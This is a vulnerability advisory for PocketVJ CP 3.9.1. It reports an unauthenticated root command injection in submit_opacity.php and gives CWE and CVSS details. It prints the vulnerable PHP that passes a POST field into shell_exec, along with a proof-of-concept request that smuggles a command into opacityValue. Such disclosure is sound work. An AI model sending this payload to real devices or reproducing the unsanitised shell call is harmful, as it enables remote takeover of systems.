PocketVJ CP PocketVJ-CP-v3 pvj version 3.9.1 contains a critical unauthenticated remote code execution vulnerability in the submit_opacity.php component. The application fails to sanitize user input in the opacityValue POST parameter before passing it to a shell command, allowing remote attackers to execute arbitrary commands with root privileges on the underlying system.
Vulnerability Type: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Affected Products: PocketVJ CP (PocketVJ-CP-v3) versions 3.9.1 and earlier
CPE: cpe:2.3:a:pocketvj:pocketvj-cp:3.9.1:*:*:*:*:*:*:*
CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Description: The software constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
- Remote Code Execution: TRUE
- Privilege Escalation: TRUE
- Denial of Service: TRUE
- Information Disclosure: TRUE
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
CVSS 4.0: 9.3 CRITICAL - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
CVSS 3.1: 9.8 CRITICAL - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
<?php
$alphavalue = $_POST['opacityValue'];
shell_exec("sudo /var/www/sync/dbuscontrol.sh setalpha $alphavalue");
?>POST /submit_opacity.php HTTP/1.1
Host: [target]
Content-Type: application/x-www-form-urlencoded
opacityValue=100;id>/tmp/poc.txt;Vendor Repository: https://github.com/magdesign/PocketVJ-CP-v3/releases/tag/release
Reported By: Mamdouh Alrekabi :https://www.linkedin.com/in/mamdouh-alrekabi/